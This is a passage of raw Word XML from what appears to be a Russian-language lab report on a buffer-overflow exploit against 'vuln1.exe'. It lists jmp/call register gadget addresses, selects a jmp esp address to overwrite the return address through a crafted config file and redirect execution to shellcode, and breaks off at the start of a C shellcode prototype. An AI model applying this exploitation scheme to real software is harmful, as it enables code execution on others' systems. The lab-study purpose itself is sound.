    <w:p w14:paraId="5FA201BE" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">Instruction: call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6529BB8D" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0CEEC9" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x62501026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44315156" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625010E8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330A328D" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625013D0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29420AB0" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x62501502</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A0D601" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  0x62501593</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663EDCEC" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14AE2D8B" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">Instruction: call </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7915DEDF" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571405C0" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625011E6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D7097" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x62501229</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08452288" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x6250126E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4A6E6E" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457B668D" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">Instruction: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2A19FAFA" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE14CC" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x62501297</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3430B6FE" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012A3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE902CB" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012AF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451CFB64" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012BB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E4F669" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012C7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CDCDC6" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012D3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5BDE2D" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012DF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12673580" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012EB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C2F1E" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012ED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63284D8A" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C339774" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">Instruction: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0245FB56" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C7BC93" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x62501299</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A454B" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="176142B0" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">Instruction: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>ecx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="094817E8" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC9DB13" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>0x625012A5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E63FCB" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232A2B0F" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">Instruction: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23C2AFE6" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE2CF09" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012B1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2D8D38" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148F8E6A" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">Instruction: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>edi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="62572FA7" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CC0DE2" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012BD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403D6660" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E8D5176" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Instruction: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>edx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5E7AD483" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29378BB8" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  0x625012C9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F7DB6C" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09A9A650" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">Instruction: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD648F">
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C5E0A00" w14:textId="77777777" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t>Addresses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F1622E" w14:textId="4EB29204" w:rsidR="00DD648F" w:rsidRPr="00DD648F" w:rsidRDefault="00DD648F" w:rsidP="00DD648F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD648F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="0066013A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="0066013A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>625012</w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="0066013A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484D906C" w14:textId="6CABBAA3" w:rsidR="00663784" w:rsidRDefault="0066013A" w:rsidP="006A648D">
      <w:r>
        <w:t>Действительно, можно увидеть, что адреса инструкций верны, как показано на рисунке.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7EB34C" w14:textId="77777777" w:rsidR="0066013A" w:rsidRDefault="0066013A" w:rsidP="0066013A">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="0066013A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B8DCA93" wp14:editId="485499BA">
            <wp:extent cx="6300470" cy="1897380"/>
            <wp:effectExtent l="0" t="0" r="508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A23" w14:textId="61CE396A" w:rsidR="0066013A" w:rsidRPr="00C71DDD" w:rsidRDefault="0066013A" w:rsidP="00E26F26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4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Проверка результата выполнения скрипта</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61796583" w14:textId="77777777" w:rsidR="00053892" w:rsidRPr="00C71DDD" w:rsidRDefault="00053892" w:rsidP="00053892">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10A6EC0A" w14:textId="5A11C22B" w:rsidR="00E26F26" w:rsidRPr="00053892" w:rsidRDefault="008657F0" w:rsidP="006A648D">
      <w:r>
        <w:t>Полученный адрес 62501297</w:t>
      </w:r>
      <w:r w:rsidR="00053892">
        <w:t xml:space="preserve"> будет использован для выполнения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00053892">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00053892" w:rsidRPr="00053892">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00053892">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00053892" w:rsidRPr="00053892">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7C16AC" w14:textId="77777777" w:rsidR="008657F0" w:rsidRPr="006A648D" w:rsidRDefault="008657F0" w:rsidP="006A648D"/>
    <w:p w14:paraId="240FDB85" w14:textId="4C1F4793" w:rsidR="00F038DE" w:rsidRDefault="00982A11" w:rsidP="00F038DE">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эксплуатация уязвимости в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidRPr="00982A11">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29EE7F" w14:textId="3289D093" w:rsidR="00AC4E16" w:rsidRDefault="00AC4E16" w:rsidP="00AC4E16">
      <w:r>
        <w:t xml:space="preserve">Используя ранее полученные данные об адресе инструкции </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC4E16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC4E16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD648F">
        <w:t>0x62501297</w:t>
      </w:r>
      <w:r w:rsidR="00001584">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidR="00A46EE0">
        <w:t>возможности записи посторонних данных на стек при помощи переполнения буфера</w:t>
      </w:r>
      <w:r w:rsidR="00E5587A">
        <w:t>, была разработана схема эксплуатации уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E0A9B6" w14:textId="529D76D5" w:rsidR="00444585" w:rsidRDefault="00444585" w:rsidP="00AC4E16">
      <w:r>
        <w:t>После байт, вызывающих переполнение стека, в конфигурационном файле будет находиться адрес инструкции</w:t>
      </w:r>
      <w:r w:rsidR="00805715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00805715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00805715" w:rsidRPr="00805715">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00805715">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00805715">
        <w:t xml:space="preserve"> (вместо адреса возврата)</w:t>
      </w:r>
      <w:r w:rsidR="00B16956">
        <w:t xml:space="preserve">, которая передаст управление на вершину стека, где и будет находиться </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B16956">
        <w:t>шеллкод</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B16956">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C390F53" w14:textId="42D2F64C" w:rsidR="00A62F9B" w:rsidRDefault="00BC2756" w:rsidP="00AC4E16">
      <w:r>
        <w:t xml:space="preserve">Для составления </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>шеллкода</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> сначала был написан прототип на языке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC2756">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7DB21A" w14:textId="77777777" w:rsidR="00203E5A" w:rsidRPr="00203E5A" w:rsidRDefault="00203E5A" w:rsidP="00203E5A">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00203E5A">
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>windows.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00203E5A">
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00203E5A">
        <w:br/>
